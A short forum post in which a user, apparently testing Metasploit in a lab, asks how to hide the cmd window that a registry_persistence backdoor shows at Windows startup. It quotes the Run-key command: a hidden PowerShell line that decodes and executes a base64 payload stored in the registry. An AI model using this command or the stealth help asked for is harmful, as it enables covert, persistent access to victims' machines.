Vurraz Posted February 7, 2018 Share Posted February 7, 2018 Hello, I installed a registry_persistence backdoor on my lab machine. However, the problem is that once the victim machine boots, you can see an empty cmd prompt shell standing there for 10 seconds. And if I close that shell, then I won't get a meterpreter shell on my Kali machine. I wish to completely hide that shell on startup, to make the backdoor stealthy. I tried tinkering with the options in the registry key, but it didn't help. This is the data written to the registry key of the backdoor by default: (HKCU/Software/Microsoft/Windows/CurrentVersion/Run) %COMSPEC% /b /c start /b /min powershell -nop -w hidden -c "sleep 0; iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String((Get-Item 'HKCU:Software\8GU6R71p').GetValue('Jg8XwoGx'))))" I'm testing this on Windows 7 Enterprise. Quote Link to comment Share on other sites More sharing options...
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.